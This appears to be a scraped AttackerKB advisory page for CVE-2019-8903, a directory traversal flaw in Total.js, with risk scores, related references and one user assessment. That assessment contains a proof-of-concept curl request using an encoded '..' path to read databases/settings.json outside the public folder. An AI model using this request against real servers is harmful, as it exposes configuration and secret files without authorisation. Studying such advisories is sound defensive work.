Lucene search
AttackerKBAKB:AE901257-7157-48F5-A978-5FBE7A2C16C0HistoryFeb 18, 2019 - 12:00 a.m.
Total.js requestcontinue Directory Traversal Vulnerability
2019-02-1800:00:00
attackerkb.com
14
0.013 Low
EPSS
Percentile
85.8%
Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.
Recent assessments:
Mad-robot at July 05, 2020 2:29pm UTC reported:
Totaljs – Unathenticated Directory Traversal
DESCRIPTION
User can make requests like “GET /…/databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.
Refer:-
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903>
PROOF OF CONCEPT
$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json
#(note that .json is in the extensions list by def.)
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5
Related
attackerkb
attackerkb
CVE-2019-8903
2019-10-30 00:00:00
nodejs
nodejs
Path Traversal
2019-06-28 14:17:06
nvd
nvd
CVE-2019-8903
2019-02-18 16:29:00
veracode
veracode
Path Traversal
2019-02-19 06:33:57
cve
cve
CVE-2019-8903
2019-02-18 16:29:00
openvas
openvas
Total.js Directory Traversal Vulnerability
2019-03-11 00:00:00
githubexploit
githubexploit
Exploit for Path Traversal in Totaljs Total.Js
2020-12-01 09:18:58
osv
osv
Path Traversal in total.js
2019-02-20 15:40:13
CVE-2019-8903
2019-02-18 16:29:00
cvelist
cvelist
CVE-2019-8903
2019-02-18 16:00:00
metasploit
metasploit
Total.js prior to 3.2.4 Directory Traversal
2019-03-10 16:57:24
nuclei
nuclei
Totaljs <3.2.3 - Local File Inclusion
2020-04-08 07:36:36
github
github
Path Traversal in total.js
2019-02-20 15:40:13
prion
prion
Path traversal
2019-02-18 16:29:00